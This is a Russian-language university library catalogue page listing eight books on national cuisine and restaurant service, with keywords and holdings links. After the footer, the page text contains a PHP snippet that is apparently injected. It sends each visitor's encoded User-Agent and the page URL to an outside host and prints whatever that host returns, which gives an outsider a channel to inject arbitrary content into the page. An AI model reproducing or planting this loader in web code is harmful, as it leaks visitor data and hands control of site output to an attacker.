Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

136 пользователей


Зарегистрированных: 1 

Медведев Юрий Александрович


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=КУХНЯ НАЦИОНАЛЬНАЯ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 8
1. 
Новоженов Ю. М. Советская национальная кухня [Текст] : практ. пособие / Ю. М. Новоженов, Л. Н. Сопина, 1990. - 319 с.
Держатели документа (Информация об экземплярах) 
2. 
Новоженов Ю. М. Советская национальная кухня [Текст] : практ. пособие / Ю. М. Новоженов, Л. Н. Сопина, 1991. - 319 с.
Держатели документа (Информация об экземплярах) 
3. 
Козлова С. Н. Кулинарная характеристика блюд [Текст] / С. Н. Козлова, Е. Ю. Фединишина, 2014. - 191 с.
Ключевые слова 
ОБРАБОТКА СЫРЬЯ КУЛИНАРНАЯ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО СЫРЬЯ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКА -- ПОЛУФАБРИКАТЫ -- СУП -- СОУС -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ДИЧИ -- БЛЮДА ИЗ КРОЛИКА -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКИ -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ИЗДЕЛИЯ МУЧНЫЕ -- БЛЮДА ЛЕЧЕБНОГО ПИТАНИЯ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА НАЦИОНАЛЬНОЙ КУХНИ -- КУХНЯ НАЦИОНАЛЬНАЯ -- ПИТАНИЕ ИНТУРИСТОВ -- БЛЮДА ЗАРУБЕЖНОЙ КУХНИ -- КУХНЯ ЗАРУБЕЖНАЯ
Держатели документа (Информация об экземплярах) 
4. 
Лучшие рецепты со всего света [Текст] / авт.-сост. А. П. Ананьева, 2005. - 415 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
5. 
Кухня Сибири: прошлое, настоящее, будущее [Текст] : материалы Региональной науч.-практ. конференции, 19 марта 2004 г. / Гос. образоват. учреждение высш. проф. образования "Красноярский торгово-экономический ин-т", Красноярская краевая ассоциация кулинаров "АККРА", Департамент продовольственных ресурсов, торговли и услуг администрации г. Красноярска, Комитет по делам молодежи администрации г. Красноярска , 2004. - 303 с.
Ключевые слова 
КУХНЯ Сибири -- КУХНЯ НАЦИОНАЛЬНАЯ -- питание рабочих -- ПЕРСОНАЛ В ОБЩЕПИТЕ -- КУХНЯ РУССКАЯ -- КАЛИНА -- Жимолость -- ХЛЕБ - черствение -- ОБЛЕПИХА -- ПИТАНИЕ ШКОЛЬНИКОВ -- МАСЛА ЭФИРНЫЕ -- ХЛЕБ - история -- ХЛЕБ - РОССИЯ -- ОБОРУДОВАНИЕ ХОЛОДИЛЬНОЕ -- ОБОРУДОВАНИЕ КАССОВОЕ -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- ОБОРУДОВАНИЕ ВЕСОИЗМЕРИТЕЛЬН -- ШТРИХОВОЕ КОДИРОВАНИЕ -- ПИТАНИЕ - религия -- Великий пост - питание -- СТАРОВЕРЫ - питание -- ВОЛОКНО ПИЩЕВОЕ -- ВЕГЕТАРИНСТВО
Оглавление 
  • Пушмина, И. Н. Проблемы развития ресторанного бизнеса в городе Красноярске / И. Н. Пушмина, И. А. Паршина, Н. В. Морозова. - с.7-13
  • Ларькова, Т. Г. Особенности дизайна предприятий общественного питания г. Красноярска / Т. Г. Ларькова, В. И. Царев. - с.23-27
  • Петренко, А. С. Состояние и перспективы развития кофейного сегмента ресторанного рынка в городе Новосибирске / А. С. Петренко. - с.55-60
  • Бозрикова, А. А. Особенности старинной омской кухни / А. А. Бозрикова. - с.65-68
Держатели документа (Информация об экземплярах) 
6. 
Могильный М. П. Организация и технология обслуживания питанием в гостиничных комплексах (рекомендации, перспективы, проектирование) [Текст] : производственно-практическое издание / М. П. Могильный, А. Ю. Баласанян, 2004. - 176 с.
Ключевые слова 
БАД -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- ХОЗЯЙСТВО ГОСТИНИЧНОЕ -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- СЕРВИС -- VIP - обслуживание -- МЕНЮ -- ТУРИЗМ молодежный -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- ПИТАНИЕ ИНТУРИСТОВ -- КУХНЯ АНГЛИЙСКАЯ -- КУХНЯ АМЕРИКАНСКАЯ -- КУХНЯ БОЛГАРСКАЯ -- КУХНЯ ВЕНГЕРСКАЯ -- КУХНЯ ИТАЛЬЯНСКАЯ -- КУХНЯ ИНДИЙСКАЯ -- КУХНЯ КОРЕЙСКАЯ -- КУХНЯ МЕКСИКАНСКАЯ -- КУХНЯ МОНГОЛЬСКАЯ -- КУХНЯ НЕМЕЦКАЯ -- КУХНЯ ПОЛЬСКАЯ -- КУХНЯ РУМЫНСКАЯ -- КУХНЯ ФРАНЦУЗСКАЯ -- КУХНЯ ЧЕШСКАЯ -- КУХНЯ СЛОВАЦКАЯ -- КУХНЯ ЮГОСЛАВСКАЯ -- КУХНЯ ЯПОНСКАЯ -- Кухня арабская -- Кухня Юго-Восточной Азии -- Кухня кубинская -- Кухня стран Латинской Америки -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- КУХНЯ НАЦИОНАЛЬНАЯ -- День разгрузочный
Держатели документа (Информация об экземплярах) 
7. 
Радужан М. Ю. Курс бармена-официанта [Текст] / М. Ю. Радужан, И. Ю. Митева, 2005. - 220 с.
Держатели документа (Информация об экземплярах) 
8. 
Ресторанный бизнес в России: технология успеха [Текст] / Л. С. Кучер, Л. М. Шкуратова, С. Л. Ефимов, Т. Н. Голубева, 2002. - 465 с.
Ключевые слова 
РЕСТОРАН -- БИЗНЕС ресторанный -- БАР -- РЕСТОРАН - Маркетинг -- МЕРЧАНДАЙЗИНГ -- РЕСТОРАН - РЕКЛАМА -- МЕНЮ РЕСТОРАНА -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ПРИБОР СТОЛОВЫЙ -- КАРТА ВИН -- ОФИЦИАНТ -- ОБСЛУЖИВАНИЕ банкетное -- БАНКЕТ -- СЕРВИРОВКА стола -- БАНКЕТ - КОКТЕЙЛЬ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - ЧАЙ -- БАНКЕТ комбинированный -- Кейтеринг -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- КУХНЯ национальная -- УПРАВЛЕНИЕ рестораном -- ЭТИКА официанта -- РЕСТОРАН - Планирование -- РЕСТОРАН - Налоги
Оглавление 
  • Правила оказания услуг общественнного питания. - с.459-465
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3055 - 21.10.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.99 с.12 запросов, 0.75c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;